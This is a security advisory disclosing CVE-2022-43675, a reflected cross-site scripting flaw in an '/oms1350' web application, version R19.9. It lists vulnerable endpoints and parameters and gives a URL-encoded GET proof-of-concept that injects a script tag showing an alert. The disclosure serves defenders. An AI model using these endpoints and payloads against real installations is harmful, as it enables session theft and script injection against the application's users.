Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Reflected Cross-site Scripting') – CWE-79
Software Version: R19.9
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-43675
CVSv3: 6.1
Severity: Medium
Credits: Luca Di Giuseppe, Alessandro Bosco, Stefano Scipioni, Massimiliano Brolli
Multiple Cross-site scripting Reflected (XSS) vulnerability allows unauthenticated remote attackers to inject arbitrary web script or HTML into HTTP/GET parameter which reflects the user input without sanitization.
Step-by-step instructions and PoC
Cross-site scripting Reflected (XSS) vulnerability allows unauthenticated remote attackers to inject arbitrary web script or HTML into HTTP/GET parameter which reflect the user input without sanitization. This type of vulnerability has been found on numerous web application endpoints, we'll mention just a few for demonstration purposes.
Affected Endpoints
· URL: https://<host>/oms1350/pages/otn/cpbLogDisplay?filename=
o HTTP GET Parameter: filename
· URL: https://<host>/oms1350/pages/otn/connection/E2ERoutingDisplayWithOverLay?id=174&connectionName=
o HTTP GET Parameter: id
· URL: https://<host>/oms1350/pages/otn/mainOtn?menuItem=items&fromReactUI=FALSE&component=npr&resource=nes&id=101&callback=callback
o HTTP GET Parameter: all parameters
Payload used to exploit the vulnerability, it's necessary encode all payloads (URL encoding) in order to exploit the vulnerability:
GET /oms1350/pages/otn/cpbLogDisplay?filename=%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
Cookie: JSESSIONID=; NSPOS_JSESSIONID=
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
